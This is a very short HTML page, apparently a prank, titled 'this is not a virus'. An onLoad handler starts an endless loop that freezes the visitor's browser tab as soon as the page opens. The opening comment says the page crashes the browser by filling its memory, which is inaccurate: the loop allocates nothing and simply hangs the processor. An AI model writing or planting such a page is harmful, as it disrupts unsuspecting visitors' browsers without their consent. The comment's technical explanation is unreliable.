<!--this program crashes the page by filling up the memory of the browser-->
<html>
    <head>
        <title>this is not a virus</title>
    </head>
    <body onLoad="no()">

        <script>
            function no(){
                var x=0;
                while(1){
                    x=x+1
                }

            }

        </script>
    </body>
</html>